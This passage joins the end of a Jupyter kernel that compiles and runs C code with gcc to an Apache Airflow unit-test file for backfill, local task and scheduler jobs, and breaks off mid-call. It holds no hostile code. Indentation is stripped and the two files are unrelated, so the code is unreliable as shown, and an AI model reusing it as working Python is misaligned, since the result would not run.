for argument in re.findall(r'(?:[^\s,"]|"(?:\\.|[^"])*")+', value):
magics['args'] += [argument.strip('"')]
return magics
def do_execute(self, code, silent, store_history=True,
user_expressions=None, allow_stdin=False):
magics = self._filter_magics(code)
with self.new_temp_file(suffix='.c') as source_file:
source_file.write(code)
source_file.flush()
with self.new_temp_file(suffix='.out') as binary_file:
p = self.compile_with_gcc(source_file.name, binary_file.name, magics['cflags'], magics['ldflags'])
while p.poll() is None:
p.write_contents()
p.write_contents()
if p.returncode != 0: # Compilation failed
self._write_to_stderr(
"[C kernel] GCC exited with code {}, the executable will not be executed".format(
p.returncode))
return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [],
'user_expressions': {}}
p = self.create_jupyter_subprocess([self.master_path, binary_file.name] + magics['args'])
while p.poll() is None:
p.write_contents()
p.write_contents()
if p.returncode != 0:
self._write_to_stderr("[C kernel] Executable exited with code {}".format(p.returncode))
return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}}
def do_shutdown(self, restart):
"""Cleanup the created source code files and executables when shutting down the kernel"""
self.cleanup_files()
|
jobs.py
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import logging
import multiprocessing
import os
import shutil
import six
import socket
import threading
import time
import unittest
from tempfile import mkdtemp
from airflow import AirflowException, settings, models
from airflow.bin import cli
from airflow.executors import BaseExecutor, SequentialExecutor
from airflow.jobs import BackfillJob, SchedulerJob, LocalTaskJob
from airflow.models import DAG, DagModel, DagBag, DagRun, Pool, TaskInstance as TI
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.bash_operator import BashOperator
from airflow.task.task_runner.base_task_runner import BaseTaskRunner
from airflow.utils import timezone
from airflow.utils.dates import days_ago
from airflow.utils.db import provide_session
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from airflow.utils.dag_processing import SimpleDag, SimpleDagBag, list_py_file_paths
from mock import Mock, patch
from sqlalchemy.orm.session import make_transient
from tests.executors.test_executor import TestExecutor
from tests.core import TEST_DAG_FOLDER
from airflow import configuration
configuration.load_test_config()
import sqlalchemy
try:
from unittest import mock
except ImportError:
try:
import mock
except ImportError:
mock = None
DEV_NULL = '/dev/null'
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
# Include the words "airflow" and "dag" in the file contents, tricking airflow into thinking these
# files contain a DAG (otherwise Airflow will skip them)
PARSEABLE_DAG_FILE_CONTENTS = '"airflow DAG"'
UNPARSEABLE_DAG_FILE_CONTENTS = 'airflow DAG'
# Filename to be used for dags that are created in an ad-hoc manner and can be removed/
# created at runtime
TEMP_DAG_FILENAME = "temp_dag.py"
TEST_DAGS_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
class BackfillJobTest(unittest.TestCase):
def setUp(self):
self.parser = cli.CLIFactory.get_parser()
self.dagbag = DagBag(include_examples=True)
@unittest.skipIf('sqlite' in configuration.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_trigger_controller_dag(self):
dag = self.dagbag.get_dag('example_trigger_controller_dag')
target_dag = self.dagbag.get_dag('example_trigger_target_dag')
dag.clear()
target_dag.clear()
scheduler = SchedulerJob()
queue = mock.Mock()
scheduler._process_task_instances(target_dag, queue=queue)
self.assertFalse(queue.append.called)
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True
)
job.run()
scheduler = SchedulerJob()
queue = mock.Mock()
scheduler._process_task_instances(target_dag, queue=queue)
self.assertTrue(queue.append.called)
target_dag.clear()
dag.clear()
@unittest.skipIf('sqlite' in configuration.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_multi_dates(self):
dag = self.dagbag.get_dag('example_bash_operator')
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
ignore_first_depends_on_past=True
)
job.run()
session = settings.Session()
drs = session.query(DagRun).filter(
DagRun.dag_id=='example_bash_operator'
).order_by(DagRun.execution_date).all()
self.assertTrue(drs[0].execution_date == DEFAULT_DATE)
self.assertTrue(drs[0].state == State.SUCCESS)
self.assertTrue(drs[1].execution_date ==
DEFAULT_DATE + datetime.timedelta(days=1))
self.assertTrue(drs[1].state == State.SUCCESS)
dag.clear()
session.close()
@unittest.skipIf('sqlite' in configuration.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_examples(self):
"""
Test backfilling example dags
"""
# some DAGs really are just examples... but try to make them work!
skip_dags = [
'example_http_operator',
'example_twitter_dag',
'example_trigger_target_dag',
'example_trigger_controller_dag', # tested above
'test_utils', # sleeps forever
]
logger = logging.getLogger('BackfillJobTest.test_backfill_examples')
dags = [
dag for dag in self.dagbag.dags.values()
if 'example_dags' in dag.full_filepath and dag.dag_id not in skip_dags
]
for dag in dags:
dag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
for i, dag in enumerate(sorted(dags, key=lambda d: d.dag_id)):
logger.info('*** Running example DAG #{}: {}'.format(i, dag.dag_id))
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True)
job.run()
def test_backfill_ordered_concurrent_execute(self):
dag = DAG(
dag_id='test_backfill_ordered_concurrent_execute',
start_date=DEFAULT_DATE,
schedule_interval="@daily")
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
# test executor history keeps a list
history = executor.history
# check if right order. Every loop has a 'pause' (0) to change state
# from RUNNING to SUCCESS.
# 6,0,3,0,3,0,3,0 = 8 loops
self.assertEqual(8, len(history))
loop_count = 0
while len(history) > 0:
queued_tasks = history.pop(0)
if loop_count == 0:
# first loop should contain 6 tasks (3 days x 2 tasks)
self.assertEqual(6, len(queued_tasks))
if loop_count == 2 or loop_count == 4 or loop_count == 6:
# 3 days x 1 task
self.assertEqual(3, len(queued_tasks))
loop_count += 1
def test_backfill_pooled_tasks(self):
"""
Test that queued tasks are executed by BackfillJob
Test for https://github.com/airbnb/airflow/pull/1225
"""
session = settings.Session()
pool = Pool(pool='test_backfill_pooled_task_pool', slots=1)
session.add(pool)
session.commit()
dag = self.dagbag.get_dag('test_backfill_pooled_task_dag')
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
# run with timeout because this creates an infinite loop if not
# caught
with timeout(seconds=30):
job.run()
ti = TI(
task=dag.get_task('test_backfill_pooled_task'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_depends_on_past(self):
"""
Test that backfill respects ignore_depends_on_past
"""
dag = self.dagbag.get_dag('test_depends_on_past')
dag.clear()
run_date = DEFAULT_DATE + datetime.timedelta(days=5)
# backfill should deadlock
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
BackfillJob(dag=dag, start_date=run_date, end_date=run_date).run)
BackfillJob(
dag=dag,
start_date=run_date,
end_date=run_date,
ignore_first_depends_on_past=True).run()
# ti should have succeeded
ti = TI(dag.tasks[0], run_date)
ti.refresh_from_db()
self.assertEquals(ti.state, State.SUCCESS)
def test_run_ignores_all_dependencies(self):
"""
Test that run respects ignore_all_dependencies
"""
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
DEFAULT_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=DEFAULT_DATE)
ti_dependent0.refresh_from_db()
self.assertEquals(ti_dependent0.state, State.FAILED)
task1_id = 'test_run_dependency_task'
args1 = ['run',
'-A',
dag_id,
task1_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args1))
ti_dependency = TI(
task=dag.get_task(task1_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependency.refresh_from_db()
self.assertEquals(ti_dependency.state, State.FAILED)
task2_id = 'test_run_dependent_task'
args2 = ['run',
'-A',
dag_id,
task2_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args2))
ti_dependent = TI(
task=dag.get_task(task2_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependent.refresh_from_db()
self.assertEquals(ti_dependent.state, State.SUCCESS)
def test_cli_backfill_depends_on_past(self):
"""
Test that CLI respects -I argument
"""
dag_id = 'test_dagrun_states_deadlock'
run_date = DEFAULT_DATE + datetime.timedelta(days=1)
args = [
'backfill',
dag_id,
'-l',
'-s',
run_date.isoformat(),
]
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
cli.backfill,
self.parser.parse_args(args))
cli.backfill(self.parser.parse_args(args + ['-I']))
ti = TI(dag.get_task('test_depends_on_past'), run_date)
ti.refresh_from_db()
# task ran
self.assertEqual(ti.state, State.SUCCESS)
dag.clear()
def test_cli_receives_delay_arg(self):
"""
Tests that the --delay argument is passed correctly to the BackfillJob
"""
dag_id = 'example_bash_operator'
run_date = DEFAULT_DATE
args = [
'backfill',
dag_id,
'-s',
run_date.isoformat(),
'--delay_on_limit',
'0.5',
]
parsed_args = self.parser.parse_args(args)
self.assertEqual(0.5, parsed_args.delay_on_limit)
def _get_dag_test_max_active_limits(self, dag_id, max_active_runs=1):
dag = DAG(
dag_id=dag_id,
start_date=DEFAULT_DATE,
schedule_interval="@hourly",
max_active_runs=max_active_runs
)
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op1 >> op2 >> op3
op4 >> op3
dag.clear()
return dag
def test_backfill_max_limit_check_within_limit(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_within_limit',
max_active_runs=16)
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
dagruns = DagRun.find(dag_id=dag.dag_id)
self.assertEqual(2, len(dagruns))
self.assertTrue(all([run.state == State.SUCCESS for run in dagruns]))
def test_backfill_max_limit_check(self):
dag_id = 'test_backfill_max_limit_check'
run_id = 'test_dagrun'
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
dag_run_created_cond = threading.Condition()
def run_backfill(cond):
cond.acquire()
try:
dag = self._get_dag_test_max_active_limits(dag_id)
# this session object is different than the one in the main thread
thread_session = settings.Session()
# Existing dagrun that is not within the backfill range
dag.create_dagrun(
run_id=run_id,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(hours=1),
start_date=DEFAULT_DATE,
)
thread_session.commit()
cond.notify()
finally:
cond.release()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
thread_session.close()
backfill_job_thread = threading.Thread(target=run_backfill,
name="run_backfill",
args=(dag_run_created_cond,))
dag_run_created_cond.acquire()
session = settings.Session()
backfill_job_thread.start()
try:
# at this point backfill can't run since the max_active_runs has been
# reached, so it is waiting
dag_run_created_cond.wait(timeout=1.5)
dagruns = DagRun.find(dag_id=dag_id)
dr = dagruns[0]
self.assertEqual(1, len(dagruns))
self.assertEqual(dr.run_id, run_id)
# allow the backfill to execute by setting the existing dag run to SUCCESS,
# backfill will execute dag runs 1 by 1
dr.set_state(State.SUCCESS)
session.merge(dr)
session.commit()
session.close()
backfill_job_thread.join()
dagruns = DagRun.find(dag_id=dag_id)
self.assertEqual(3, len(dagruns)) # 2 from backfill + 1 existing
self.assertEqual(dagruns[-1].run_id, dr.run_id)
finally:
dag_run_created_cond.release()
def test_backfill_max_limit_check_no_count_existing(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_no_count_existing')
start_date = DEFAULT_DATE
end_date = DEFAULT_DATE
# Existing dagrun that is within the backfill range
dag.create_dagrun(run_id="test_existing_backfill",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
# BackfillJob will run since the existing DagRun does not count for the max
# active limit since it's within the backfill date range.
dagruns = DagRun.find(dag_id=dag.dag_id)
# will only be able to run 1 (the existing one) since there's just
# one dag run slot left given the max_active_runs limit
self.assertEqual(1, len(dagruns))
self.assertEqual(State.SUCCESS, dagruns[0].state)
def test_backfill_max_limit_check_complete_loop(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_complete_loop')
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
# Given the max limit to be 1 in active dag runs, we need to run the
# backfill job 3 times
success_expected = 2
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
success_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.SUCCESS))
running_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.RUNNING))
self.assertEqual(success_expected, success_dagruns)
self.assertEqual(0, running_dagruns) # no dag_runs in running state are left
def test_sub_set_subdag(self):
dag = DAG(
'test_sub_set_subdag',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
sub_dag = dag.sub_dag(task_regex="leave*",
include_downstream=False,
include_upstream=False)
job = BackfillJob(dag=sub_dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
job.run()
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(BackfillJob.ID_FORMAT_PREFIX.format(DEFAULT_DATE.isoformat()),
dr.run_id)
for ti in dr.get_task_instances():
if ti.task_id == 'leave1' or ti.task_id == 'leave2':
self.assertEqual(State.SUCCESS, ti.state)
else:
self.assertEqual(State.NONE, ti.state)
def test_backfill_fill_blanks(self):
dag = DAG(
'test_backfill_fill_blanks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'},
)
with dag:
op1 = DummyOperator(task_id='op1')
op2 = DummyOperator(task_id='op2')
op3 = DummyOperator(task_id='op3')
op4 = DummyOperator(task_id='op4')
op5 = DummyOperator(task_id='op5')
op6 = DummyOperator(task_id='op6')
dag.clear()
dr = dag.create_dagrun(run_id='test',
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
session = settings.Session()
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id == op1.task_id:
ti.state = State.UP_FOR_RETRY
ti.end_date = DEFAULT_DATE
elif ti.task_id == op2.task_id:
ti.state = State.FAILED
elif ti.task_id == op3.task_id:
ti.state = State.SKIPPED
elif ti.task_id == op4.task_id:
ti.state = State.SCHEDULED
elif ti.task_id == op5.task_id:
ti.state = State.UPSTREAM_FAILED
# op6 = None
session.merge(ti)
session.commit()
session.close()
job = BackfillJob(dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
self.assertRaisesRegexp(
AirflowException,
'Some task instances failed',
job.run)
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(dr.state, State.FAILED)
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id in (op1.task_id, op4.task_id, op6.task_id):
self.assertEqual(ti.state, State.SUCCESS)
elif ti.task_id == op2.task_id:
self.assertEqual(ti.state, State.FAILED)
elif ti.task_id == op3.task_id:
self.assertEqual(ti.state, State.SKIPPED)
elif ti.task_id == op5.task_id:
self.assertEqual(ti.state, State.UPSTREAM_FAILED)
def test_backfill_execute_subdag(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.schedule_interval = '@daily'
start_date = timezone.utcnow()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=start_date,
end_date=start_date,
executor=executor,
donot_pickle=True)
job.run()
history = executor.history
subdag_history = history[0]
# check that all 5 task instances of the subdag 'section-1' were executed
self.assertEqual(5, len(subdag_history))
for sdh in subdag_history:
ti = sdh[3]
self.assertIn('section-1-task-', ti.task_id)
subdag.clear()
dag.clear()
def test_update_counters(self):
dag = DAG(
dag_id='test_manage_executor_state',
start_date=DEFAULT_DATE)
task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
job = BackfillJob(dag=dag)
session = settings.Session()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task1, dr.execution_date)
ti.refresh_from_db()
ti_status = BackfillJob._DagRunTaskStatus()
# test for success
ti.set_state(State.SUCCESS, session)
ti_status.started[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.started) == 0)
self.assertTrue(len(ti_status.succeeded) == 1)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.succeeded.clear()
# test for skipped
ti.set_state(State.SKIPPED, session)
ti_status.started[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.started) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 1)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.skipped.clear()
# test for failed
ti.set_state(State.FAILED, session)
ti_status.started[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.started) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 1)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.failed.clear()
# test for reschedule
# test for failed
ti.set_state(State.NONE, session)
ti_status.started[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.started) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
session.close()
def test_dag_get_run_dates(self):
def get_test_dag_for_backfill(schedule_interval=None):
dag = DAG(
dag_id='test_get_dates',
start_date=DEFAULT_DATE,
schedule_interval=schedule_interval)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
return dag
test_dag = get_test_dag_for_backfill()
self.assertEqual([DEFAULT_DATE], test_dag.get_run_dates(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE))
test_dag = get_test_dag_for_backfill(schedule_interval="@hourly")
self.assertEqual([DEFAULT_DATE - datetime.timedelta(hours=3),
DEFAULT_DATE - datetime.timedelta(hours=2),
DEFAULT_DATE - datetime.timedelta(hours=1),
DEFAULT_DATE],
test_dag.get_run_dates(
start_date=DEFAULT_DATE - datetime.timedelta(hours=3),
end_date=DEFAULT_DATE,))
class LocalTaskJobTest(unittest.TestCase):
def setUp(self):
pass
@patch('os.getpid')
def test_localtaskjob_heartbeat(self, mock_pid):
session = settings.Session()
dag = DAG(
'test_localtaskjob_heartbeat',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = "blablabla"
session.commit()
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
self.assertRaises(AirflowException, job1.heartbeat_callback)
mock_pid.return_value = 1
ti.state = State.RUNNING
ti.hostname = socket.getfqdn()
ti.pid = 1
session.merge(ti)
session.commit()
ret = job1.heartbeat_callback()
self.assertEqual(ret, None)
mock_pid.return_value = 2
self.assertRaises(AirflowException, job1.heartbeat_callback)
def test_mark_success_no_kill(self):
"""
Test that ensures that mark_success in the UI doesn't cause
the task to fail, and that the task exits
"""
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_mark_success')
task = dag.get_task('task1')
session = settings.Session()
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
process = multiprocessing.Process(target=job1.run)
process.start()
ti.refresh_from_db()
for i in range(0, 50):
if ti.state == State.RUNNING:
break
time.sleep(0.1)
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
process.join(timeout=10)
self.assertFalse(process.is_alive())
ti.refresh_from_db()
self.assertEqual(State.SUCCESS, ti.state)
def test_localtaskjob_double_trigger(self):
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=task.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = socket.getfqdn()
ti.pid = 1
session.commit()
ti_run = TI(task=task, execution_date=DEFAULT_DATE)
job1 = LocalTaskJob(task_instance=ti_run,
ignore_ti_state=True,
executor=SequentialExecutor())
with patch.object(BaseTaskRunner, 'start', return_value=None) as mock_method:
job1.run()
mock_method.assert_not_called()
ti = dr.get_task_instance(task_id=task.task_id, session=session)
self.assertEqual(ti.pid, 1)
self.assertEqual(ti.state, State.RUNNING)
session.close()
class SchedulerJobTest(unittest.TestCase):
# These defaults make the test faster to run
default_scheduler_args = {"file_process_interval": 0,
"processor_poll_interval": 0.5}
def setUp(self):
self.dagbag = DagBag()
session = settings.Session()
session.query(models.DagRun).delete()
session.query(models.ImportError).delete()
session.commit()
@staticmethod
def run_single_scheduler_loop_with_no_dags(dags_folder):
"""
Utility function that runs a single scheduler loop without actually
changing/scheduling any dags. This is useful to simulate the other side effects of
running a scheduler loop, e.g. to see what parse errors there are in the
dags_folder.
:param dags_folder: the directory to traverse
:type directory: str
"""
scheduler = SchedulerJob(
dag_id='this_dag_doesnt_exist', # We don't want to actually run anything
num_runs=1,
subdir=os.path.join(dags_folder))
scheduler.heartrate = 0
scheduler.run()
def _make_simple_dag_bag(self, dags):
return SimpleDagBag([SimpleDag(dag) for dag in dags])
def test_process_executor_events(self):
dag_id = "test_process_executor_events"
dag_id2 = "test_process_executor_events_2"
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
dag2 = DAG(dag_id=dag_id2, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag2, task_id=task_id_1)
dagbag1 = self._make_simple_dag_bag([dag])
dagbag2 = self._make_simple_dag_bag([dag2])
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.QUEUED
session.merge(ti1)
session.commit()
executor = TestExecutor()
executor.event_buffer[ti1.key] = State.FAILED
scheduler.executor = executor
# dag bag does not contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag2)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.QUEUED)
# dag bag does contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.FAILED)
ti1.state = State.SUCCESS
session.merge(ti1)
session.commit()
executor.event_buffer[ti1.key] = State.SUCCESS
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.SUCCESS)
def test_execute_task_instances_is_paused_wont_execute(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_is_paused_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
dr1.state = State.RUNNING
dagmodel = models.DagModel()
dagmodel.dag_id = dag_id
dagmodel.is_paused = True
session.merge(ti1)
session.merge(dr1)
session.add(dagmodel)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEquals(State.SCHEDULED, ti1.state)
def test_execute_task_instances_no_dagrun_task_will_execute(self):
"""
Tests that tasks without dagrun still get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_no_dagrun_task_will_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
ti1.execution_date = ti1.execution_date + datetime.timedelta(days=1)
session.merge(ti1)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEquals(State.QUEUED, ti1.state)
def test_execute_task_instances_backfill_tasks_wont_execute(self):
"""
Tests that backfill tasks won't get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_backfill_tasks_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.run_id = BackfillJob.ID_PREFIX + '_blah'
ti1 = TI(task1, dr1.execution_date)
ti1.refresh_from_db()
ti1.state = State.SCHEDULED
session.merge(ti1)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEquals(State.SCHEDULED, ti1.state)
def test_find_executable_task_instances_backfill_nodagrun(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_backfill_nodagrun'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr2.run_id = BackfillJob.ID_PREFIX + 'asdf'
ti_no_dagrun = TI(task1, DEFAULT_DATE - datetime.timedelta(days=1))
ti_backfill = TI(task1, dr2.execution_date)
ti_with_dagrun = TI(task1, dr1.execution_date)
# ti_with_paused
ti_no_dagrun.state = State.SCHEDULED
ti_backfill.state = State.SCHEDULED
ti_with_dagrun.state = State.SCHEDULED
session.merge(dr2)
session.merge(ti_no_dagrun)
session.merge(ti_backfill)
session.merge(ti_with_dagrun)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
